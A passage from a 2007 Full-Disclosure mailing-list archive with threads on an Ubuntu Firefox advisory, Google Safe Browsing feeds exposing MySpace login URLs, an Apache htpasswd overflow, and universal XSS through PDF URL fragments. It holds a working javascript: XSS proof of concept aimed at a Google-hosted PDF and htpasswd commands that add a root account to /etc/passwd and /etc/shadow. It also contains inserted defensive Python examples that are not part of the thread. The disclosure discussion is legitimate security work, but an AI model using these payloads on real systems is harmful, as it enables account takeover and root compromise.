18bcf4fe486d5d5223c6cff38fc2badd http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.06_sparc.deb Size/MD5: 1084034 f76db440d2206b0f6cccda184bbc1380 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.10.diff.gz Size/MD5: 35266 30be4e65c986ec185ff1bc0855b1debb http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.10.dsc Size/MD5: 702 0ba7b9609b67a3312af4eda07da0b342 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1.orig.tar.gz Size/MD5: 1892121 
0678b72e07e69c41709d71ef0fe5da13 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-4ubuntu2.6.10_amd64.deb Size/MD5: 88446 f05692dbf3a8ece4a7c4897fca454fe1 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.10_amd64.deb Size/MD5: 1131030 1500cfb7d6066f6df6ac510dbd133a57 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-4ubuntu2.6.10_i386.deb Size/MD5: 87712 f17dcbf4a518d4704f203f6694166ab1 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.10_i386.deb Size/MD5: 1085166 861a156c3ac25b0908756cb83c593ff3 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-4ubuntu2.6.10_powerpc.deb Size/MD5: 89888 b98545747a5f409b99fa7667ce034595 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.10_powerpc.deb Size/MD5: 1136062 b20c1b12d34f3cf52ed85d6a8441eb0e sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-4ubuntu2.6.10_sparc.deb Size/MD5: 87830 547b4ccbf9cde9c40ad8a18e0a67436e http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.10_sparc.deb Size/MD5: 1099004 7175fd58a8037a2d6a652a661c09c3ac -------------- next part -------------- A non-text attachment was scrubbed... 
From geekboy at angrykeyboarder.com Wed Jan 3 05:23:32 2007
From: geekboy at angrykeyboarder.com (Scott)
Date: Tue, 02 Jan 2007 22:23:32 -0700
Subject: [Full-disclosure] [USN-398-1] Firefox vulnerabilities
In-Reply-To: <20070103024138.GR4462@outflux.net>
References: <20070103024138.GR4462@outflux.net>
Message-ID: <459B3DD4.3010104@angrykeyboarder.com>

Kees Cook spake thusly on 01/02/2007 07:41 PM:
> ===========================================================
> Ubuntu Security Notice USN-398-1 January 02, 2007
> firefox vulnerabilities
> CVE-2006-6497, CVE-2006-6498, CVE-2006-6499, CVE-2006-6501,
> CVE-2006-6502, CVE-2006-6503, CVE-2006-6504, CVE-2006-6506,
> CVE-2006-6507
> ===========================================================
>
> A security issue affects the following Ubuntu releases:
>
> Ubuntu 6.10
>
> This advisory also applies to the corresponding versions of
> Kubuntu, Edubuntu, and Xubuntu.
>
> The problem can be corrected by upgrading your system to the
> following package versions:
>
> Ubuntu 6.10:
> firefox 2.0.0.1+0dfsg-0ubuntu0.6.10
> firefox-dev 2.0.0.1+0dfsg-0ubuntu0.6.10
> libnspr-dev 2.0.0.1+0dfsg-0ubuntu0.6.10
> libnspr4 2.0.0.1+0dfsg-0ubuntu0.6.10
> libnss-dev 2.0.0.1+0dfsg-0ubuntu0.6.10
> libnss3 2.0.0.1+0dfsg-0ubuntu0.6.10
>
> After a standard system upgrade you need to restart Firefox to effect
> the necessary changes.
>
> Details follow:
>
> Various flaws have been reported that allow an attacker to execute
> arbitrary code with user privileges by tricking the user into opening
> a malicious web page containing JavaScript or SVG. (CVE-2006-6497,
> CVE-2006-6498, CVE-2006-6499, CVE-2006-6501, CVE-2006-6502,
> CVE-2006-6504)
>
> Various flaws have been reported that allow an attacker to bypass
> Firefox's internal XSS protections by tricking the user into opening a
> malicious web page containing JavaScript. (CVE-2006-6503,
> CVE-2006-6507)
>
> Jared Breland discovered that the "Feed Preview" feature could leak
> referrer information to remote servers. (CVE-2006-6506)

We're getting better. This one only took 9 days...

http://www.mozilla.com/en-US/firefox/2.0.0.1/releasenotes/

--
Scott
http://angrykeyboarder.com
© 2007 angrykeyboarder & Elmer Fudd. All Wights Wesewved

From info at beskerming.com Wed Jan 3 06:35:11 2007
From: info at beskerming.com (Sünnet Beskerming)
Date: Wed, 3 Jan 2007 17:05:11 +1030
Subject: [Full-disclosure] Google's blacklisted url database (phishing url database)

Hi List,

"How exactly does such data get captured? Somebody placed a link somewhere with the url having the user/password in it?"

A bit of digging turns up the Google Gadget that these little MySpace gems are coming from (http://www.google.com/ig/directory?url=http://web.ebuell.com/myspace.xml). Why the developer chose to pass / accept authentication details in the URL without warning the end user is beyond me. Perhaps it is related to his claims that it can be used as a proxy to access MySpace when the main site is being blocked by filters.

Unfortunately for Google, the URLs listed clearly identify that the mistake is a result of Google indexing the Google Gadgets that people have placed on their sites / Google homepages.

It is interesting to see the quality of the passwords on this list of presumably live accounts, though I do think that some of the users are a little insecure about more than just their passwords...
Even though searching for various elements of the listed URLs across a number of the major search engines doesn't turn up anything of interest, the author claims that it has been used almost 3.5 million times from Google (distinct users would be less, but it would make for interesting sniffing).

Carl

Sünnet Beskerming Pty. Ltd.
Adelaide, Australia
http://www.beskerming.com

From monikerd at gmail.com Wed Jan 3 03:21:11 2007
From: monikerd at gmail.com (moniker monikerd)
Date: Wed, 3 Jan 2007 04:21:11 +0100
Subject: [Full-disclosure] Google's blacklisted url database (phishing url database)
In-Reply-To: <447d701a0701021919n33efb7fai18eac103841a0f69@mail.gmail.com>
References: <200701022317.08793.phoenix.diablo@gmail.com> <001c01c72ec0$2e510a50$650ba8c0@DORKA> <447d701a0701021919n33efb7fai18eac103841a0f69@mail.gmail.com>
Message-ID: <447d701a0701021921p66065f5bp834cbb0b084f391d@mail.gmail.com>

I see only two possible ways for Google to get this kind of data:

Google Toolbar, or it buys/gets this information from some ISPs/companies/anybody with a big enough pipe.

On 1/2/07, php0t wrote:
> How exactly does such data get captured? Somebody placed a link
> somewhere with the url having the user/password in it? What would be
> the point of that? And if not, where did that come from? I peeked at
> http://www.google.com/tools/firefox/safebrowsing/faq.html to learn more
> but it only has obvious info.
>
> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk
> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of JM
> Sent: Tuesday, January 02, 2007 11:17 PM
> To: full-disclosure at lists.grok.org.uk
> Subject: Re: [Full-disclosure] Google's blacklisted url database
> (phishing url database)
>
> I just played around a bit with those lists and as it seems, Google did
> a splendid job, even capturing some people's login data. Like here:
> http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7753
>
> Regards,
> J.M.
> Professional Lurker
>
> >[By] "Rajesh Sethumadhavan"
> >[Date] Tuesday, 2 January 2007 18:42
> >[To] full-disclosure at lists.grok.org.uk
> >[Subject] [Full-disclosure] Google's blacklisted url database (phishing url database)
> >
> > It is possible to access google`s blacklisted url database ( phishing
> > url database )
> >
> > http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1
> > http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7998
> > http://sb.google.com/safebrowsing/update?version=goog-white-domain:1:19,goog-white-url:1:371,goog-black-url:1:7693,goog-black-enchash:1:15282
> >
> > This database (Part of Google Safe Browsing) can be used in any
> > anti-phishing commercial softwares :)
> >
> > Regards
> > Rajesh Sethumadhavan
> > http://www.xdisclose.com
From rajesh.sethumadhavan at yahoo.com Wed Jan 3 09:24:04 2007
From: rajesh.sethumadhavan at yahoo.com (Rajesh Sethumadhavan)
Date: Wed, 3 Jan 2007 01:24:04 -0800 (PST)
Subject: [Full-disclosure] Google's blacklisted url database (phishing url database)
In-Reply-To: <447d701a0701021921p66065f5bp834cbb0b084f391d@mail.gmail.com>
Message-ID: <447682.93039.qm@web37215.mail.mud.yahoo.com>

http://sb.google.com/safebrowsing/update?versio=goog-black-url:1:0000

version info for each file:
---------------------------------------------------
[goog-black-enchash 1.15525]
[goog-black-url 1.7755]
[goog-sandbox-text 1.5]
[goog-white-domain 1.19]
[goog-white-url 1.371]
-----------------------------------------------------

interpolating "goog-sandbox-text" gives this URL:

http://sb.google.com/safebrowsing/update?version=goog-sandbox-text:1:7753

which sends:
------------------------------------------------
[goog-sandbox-text 1.5]
+sandbox function%20getHandlers%28%29%7Breturn%5B%5D%7D%0A%3B%0A%0A
------------------------------------------------

Oooh look, a hard-coded hash function. Paydirt ;)

http://sb.google.com/safebrowsing/update?version=goog-white-domain:1:7753

This one's presumably the white-listed domains:

moniker monikerd wrote:
> I see only two possible ways for Google to get this kind of data.
>
> Google Toolbar, or it buys/gets this information from some
> ISPs/companies/anybody with a big enough pipe.
>
> On 1/2/07, php0t wrote:
> > How exactly does such data get captured? Somebody placed a link
> > somewhere with the url having the user/password in it? What would be
> > the point of that? And if not, where did that come from? I peeked at
> > http://www.google.com/tools/firefox/safebrowsing/faq.html to learn more
> > but it only has obvious info.
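Added example, not code from any message in this thread and not Google's: a small Python scanner for the kind of leak J.M. and Sünnet Beskerming describe, login credentials embedded in URLs that ended up in the goog-black-url feed. It reads a feed in the "[name major.minor]" header plus "+entry" line shape visible in Rajesh's message, flags entries that carry userinfo (user:pass@host) or a password-like query parameter, and redacts them before they are written anywhere. The sample feed, hosts, user names and passwords are constructed, and SECRET_PARAMS is an assumed starting list of parameter names.

```python
"""Scan a URL blocklist feed for entries that embed login credentials.

Added example for this thread; it is not Google's code and not code
posted by anyone in the thread. SAMPLE_FEED below is constructed: it
copies only the "[name major.minor]" header and "+entry" line shape
visible in the thread, and every host, user name and password in it
is invented. SECRET_PARAMS is an assumed starting list of query-parameter
names worth flagging.
"""
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

SECRET_PARAMS = {"password", "passwd", "pass", "pwd", "pw", "secret", "token"}

SAMPLE_FEED = """[goog-black-url 1.7755]
+http://phish.example.net/login.php
+http://user1:Hunter2@proxy.example.org/myspace.xml
+http://gadget.example.org/proxy?user=alice&password=letmein&page=home
+http://update.example.com/check?version=2
-http://false-positive.example.com/
"""


def parse_feed(text):
    """Yield (op, url) for every '+' (add) or '-' (remove) line.

    Header lines such as "[goog-black-url 1.7755]" and blank lines are
    skipped; anything else is ignored rather than guessed at.
    """
    for line in text.splitlines():
        line = line.strip()
        if line and line[0] in "+-":
            yield line[0], line[1:]


def find_credentials(url):
    """Return the credential material embedded in one URL, or {} if none.

    Two places are checked: the RFC 3986 userinfo part (user:pass@host)
    and query parameters whose name is in SECRET_PARAMS.
    """
    parts = urlsplit(url)
    found = {}
    if parts.username:
        found["userinfo.user"] = parts.username
    if parts.password:
        found["userinfo.password"] = parts.password
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in SECRET_PARAMS:
            found["query." + name] = value
    return found


def redact(url):
    """Return url with userinfo and secret query values replaced.

    Safe to log or to paste into a ticket: host, path and the non-secret
    parameters survive, the secrets do not. The query is rebuilt with
    urlencode, so unusual percent-encodings may come back normalised.
    """
    parts = urlsplit(url)
    netloc = parts.hostname or ""
    if parts.port:
        netloc += f":{parts.port}"
    if parts.username or parts.password:
        netloc = "REDACTED@" + netloc
    pairs = [
        (name, "REDACTED" if name.lower() in SECRET_PARAMS else value)
        for name, value in parse_qsl(parts.query, keep_blank_values=True)
    ]
    return urlunsplit((parts.scheme, netloc, parts.path, urlencode(pairs), parts.fragment))


def scan(text):
    """Return [(redacted_url, findings)] for every '+' entry that leaks."""
    leaks = []
    for op, url in parse_feed(text):
        if op != "+":
            continue
        findings = find_credentials(url)
        if findings:
            leaks.append((redact(url), findings))
    return leaks


if __name__ == "__main__":
    for safe_url, findings in scan(SAMPLE_FEED):
        print(safe_url, sorted(findings))
```

Running it on the constructed feed reports the two leaking entries (one with userinfo, one with a password query parameter) and leaves the plain phishing URLs alone. Note that the redacted form is what should go into any report about such a feed; the thread itself shows what happens when the raw URLs are passed around.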
From andfarm at gmail.com Tue Jan 2 23:45:45 2007
From: andfarm at gmail.com (Andrew Farmer)
Date: Tue, 2 Jan 2007 15:45:45 -0800
Subject: [Full-disclosure] Apache 1.3.37 htpasswd buffer overflow vulnerability
In-Reply-To: <47c0571c0701021220r6ad0169l4d0f9d70ffdd7653@mail.gmail.com>
References: <47c0571c0701021220r6ad0169l4d0f9d70ffdd7653@mail.gmail.com>

On 02 Jan 07, at 12:20, Matias Soler wrote:
> Synopsis: Apache 1.3.37 htpasswd buffer overflow vulnerability
> Version: 1.3.37 (latest 1.3.xx)
>
> Product
> =======
> Apache htpasswd utility
>
> Issue
> =====
> A buffer overflow vulnerability has been found; it is dangerous only in
> environments where the binary is suid root.

If htpasswd is setuid, then one could just as easily:

htpasswd -bp /etc/passwd toor x:0:0:toor::/:/bin/sh
htpasswd -bp /etc/shadow toor xxa8fjDF6WqBA:0:0:99999:7:::

and get root. (Or any number of things - sudoers, crontab, SSH keys - take your pick.)

It's possible that this buffer overflow may be significant in very limited circumstances - if the utility is executed from a web application, perhaps. However, this seems like a rather limited-scope issue.
--
Andrew Farmer

From stan.bubrouski at gmail.com Wed Jan 3 07:58:40 2007
From: stan.bubrouski at gmail.com (Stan Bubrouski)
Date: Wed, 3 Jan 2007 02:58:40 -0500
Subject: [Full-disclosure] Google's blacklisted url database (phishing url database)
In-Reply-To: <447d701a0701021921p66065f5bp834cbb0b084f391d@mail.gmail.com>
References: <200701022317.08793.phoenix.diablo@gmail.com> <001c01c72ec0$2e510a50$650ba8c0@DORKA> <447d701a0701021919n33efb7fai18eac103841a0f69@mail.gmail.com> <447d701a0701021921p66065f5bp834cbb0b084f391d@mail.gmail.com>
Message-ID: <122827b90701022358n660125d2if991b8f5459bc1e0@mail.gmail.com>

You're forgetting that Gmail has a feature to report phishing messages; that alone could give Google quite a list of phishing sites given its userbase.

-sb

On 1/2/07, moniker monikerd wrote:
> I see only two possible ways for Google to get this kind of data.
>
> Google Toolbar, or it buys/gets this information from some
> ISPs/companies/anybody with a big enough pipe.
>
> On 1/2/07, php0t wrote:
> > How exactly does such data get captured? Somebody placed a link
> > somewhere with the url having the user/password in it? What would be
> > the point of that? And if not, where did that come from? I peeked at
> > http://www.google.com/tools/firefox/safebrowsing/faq.html to learn more
> > but it only has obvious info.
From pdp.gnucitizen at googlemail.com Wed Jan 3 02:20:01 2007
From: pdp.gnucitizen at googlemail.com (pdp (architect))
Date: Wed, 3 Jan 2007 02:20:01 +0000
Subject: [Full-disclosure] Universal XSS with PDF files: highly dangerous
Message-ID: <6905b1570701021820v7b22961do7226be1bcf04fa57@mail.gmail.com>

I will be very quick and just point to links where you can read about this issue.

It seems that PDF documents can execute JavaScript code for no apparent reason by using the following template:

http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here

You must understand that the attacker doesn't need to have write access to the specified PDF document. In order to get an XSS vector working you need to have a PDF file hosted on the target and that's all about it. The rest is just a matter of your abilities and desires.

This finding was originally mentioned by Sven Vetsch, on his blog. This is very good and quite interesting. Good work.

There is a POC I composed:

http://www.google.com/librariancenter/downloads/Tips_Tricks_85x11.pdf#something=javascript:function%20createXMLHttpRequest(){%20%20%20try{%20return%20new%20ActiveXObject('Msxml2.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20ActiveXObject('Microsoft.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20XMLHttpRequest();%20}catch(e){}%20%20%20return%20null;}var%20xhr%20=%20createXMLHttpRequest();xhr.onreadystatechange%20=%20function(){%20%20%20%20if%20(xhr.readyState%20==%204)%20%20%20%20%20%20%20%20alert(xhr.responseText);};xhr.open('GET',%20'http://www.google.com',%20true);xhr.send(null);

More on the matter can be found here:

http://www.gnucitizen.org/blog/danger-danger-danger/
http://www.disenchant.ch/blog/hacking-with-browser-plugins/34

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org

From aksecurity at gmail.com Wed Jan 3 05:17:44 2007
From: aksecurity at gmail.com (Amit Klein)
Date: Wed, 03 Jan 2007 07:17:44 +0200
Subject: [Full-disclosure] [WEB SECURITY] Universal XSS with PDF files: highly dangerous
In-Reply-To: <6905b1570701021820v7b22961do7226be1bcf04fa57@mail.gmail.com>
References: <6905b1570701021820v7b22961do7226be1bcf04fa57@mail.gmail.com>
Message-ID: <459B3C78.2080007@gmail.com>

pdp (architect) wrote:
> I will be very quick and just point to links where you can read about
> this issue.
>
> It seems that PDF documents can execute JavaScript code for no
> apparent reason by using the following template:
>
> http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here
>
> You must understand that the attacker doesn't need to have write
> access to the specified PDF document. In order to get an XSS vector
> working you need to have a PDF file hosted on the target and that's
> all about it. The rest is just a matter of your abilities and desires.

Amazing, and kudos to Sven Vetsch who found this.

Note that from attack categorization perspective, it appears to be a twisted example of DOM based XSS (http://www.webappsec.org/projects/articles/071105.shtml). I suppose PDF retrieves the URL from the browser (probably from a degenerate DOM the browser provides it - after all, the document object is available to the payload JS code!), parses it and uses the fragment. Since fragments are used, the payload doesn't travel to the target web server (!). I mentioned the possible use of fragments as a particularly nasty attack vector (impossible to detect on server) in the "DOM based XSS" writeup.
-Amit

From sven.vetsch at disenchant.ch Wed Jan 3 08:37:00 2007
From: sven.vetsch at disenchant.ch (sven.vetsch at disenchant.ch)
Date: Wed, 03 Jan 2007 09:37:00 +0100
Subject: [Full-disclosure] [WEB SECURITY] Universal XSS with PDF files: highly dangerous
In-Reply-To: <6905b1570701021820v7b22961do7226be1bcf04fa57@mail.gmail.com>
References: <6905b1570701021820v7b22961do7226be1bcf04fa57@mail.gmail.com>
Message-ID: <1167813420.459b6b2c0a8d7@www.mail2web.ch>

Quoting "pdp (architect)":
> This finding was originally mentioned by Sven Vetsch, on his blog.
> This is very good and quite interesting. Good work.

Sorry about that, but that's wrong. All the credits have to go to Stefano Di Paola and Giorgio Fedon. They presented that stuff at the 23C3 in Berlin. The only thing that I did was an overview, and I found out that it doesn't matter what the parameter is called. I "just" forgot to copy-paste the credits from my original document to the blog entry. I'm very sorry about that, and of course I put it in my entry now.

Regards,
Disenchant / Sven Vetsch

From steve at localhost.lu Wed Jan 3 09:58:55 2007
From: steve at localhost.lu (Steve Clement)
Date: Wed, 03 Jan 2007 10:58:55 +0100
Subject: [Full-disclosure] Google's blacklisted url database (phishing url database)
In-Reply-To: <001c01c72ec0$2e510a50$650ba8c0@DORKA>
References: <001c01c72ec0$2e510a50$650ba8c0@DORKA>
Message-ID: <459B7E5F.4020202@localhost.lu>

php0t wrote:
> How exactly does such data get captured? Somebody placed a link

Well, the poster of the password link would've done better explaining how goog mines the data instead of easily disclosing valid e-mail passwords.

This shows yet again how crucial it is to use throw-away passwords that you can use for badly coded web sites that disclose passwords plain-text in the URL.

It's not really Google's fault if some people don't know how web-security basics work. They grab the web, crawl it hideously and find all of it, including sensitive data.

As to whether the blacklist should be public or not is up to personal beliefs. I for one think that it should be publicly available to have at least a good static reference of the most commonly used phishy sites...

thanks for the fish and Goodbye!

Steve

> somewhere with the url having the user/password in it ? What would be
> the point of th
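Back to the "Universal XSS with PDF files" exchange earlier in this digest, and Amit Klein's point that a fragment-based payload never travels to the server: the following is an added Python example, not code from pdp, Amit Klein, Sven Vetsch or Adobe. It splits a URL in the shape of the posted template into the part an HTTP client actually sends (the request line) and the part only the browser and the PDF plugin see (the fragment), and applies the only kind of check that can catch this, one that runs on the client side of the '#'. The target host and payload are constructed.

```python
"""Why the PDF "#name=javascript:..." vector never shows up on the server.

Added example for the Universal XSS with PDF files thread; it is not code
from pdp, Amit Klein, Sven Vetsch or Adobe. TARGET is a constructed URL
in the shape of the template posted in the thread (host and payload are
invented); the request line follows the usual HTTP/1.1 form.
"""
from urllib.parse import unquote, urlsplit

TARGET = "http://www.example.com/docs/report.pdf#x=javascript:alert(document.cookie)"


def request_line(url):
    """Return the request line an HTTP/1.1 client sends for url.

    Only path and query are included: per RFC 3986 the fragment stays in
    the client, so the web server, its access log and any server-side
    filter never see what follows '#'.
    """
    parts = urlsplit(url)
    target = parts.path or "/"
    if parts.query:
        target += "?" + parts.query
    return f"GET {target} HTTP/1.1"


def fragment_payload(url):
    """Split the fragment into (name, value), percent-decoded.

    Returns None when the fragment has no '='. The name is returned only
    for display: as the thread notes, the plugin does not care what it is;
    the javascript: value is what matters.
    """
    fragment = urlsplit(url).fragment
    if "=" not in fragment:
        return None
    name, _, value = fragment.partition("=")
    return unquote(name), unquote(value)


def script_in_fragment(url):
    """True if the fragment value is a javascript: URL.

    The test runs after percent-decoding and whitespace stripping, so
    'java%73cript:' and ' javascript:' are caught as well. This is the
    kind of check only a client-side component (browser, extension, the
    viewer itself) can make; see request_line for why a server cannot.
    """
    payload = fragment_payload(url)
    if payload is None:
        return False
    _, value = payload
    return value.lstrip().lower().startswith("javascript:")


if __name__ == "__main__":
    print(request_line(TARGET))        # no trace of the payload
    print(fragment_payload(TARGET))    # what the PDF viewer gets to see
    print(script_in_fragment(TARGET))  # True
```

The practical consequence for defenders is the one Amit draws: no WAF rule and no log search on the server will ever match this payload, because it is never transmitted. A server-side lever that does not depend on seeing the fragment (an editor's note, not something the thread discusses) is to stop the PDF from being rendered inline in the site's origin at all, for instance by serving it with a Content-Disposition: attachment header.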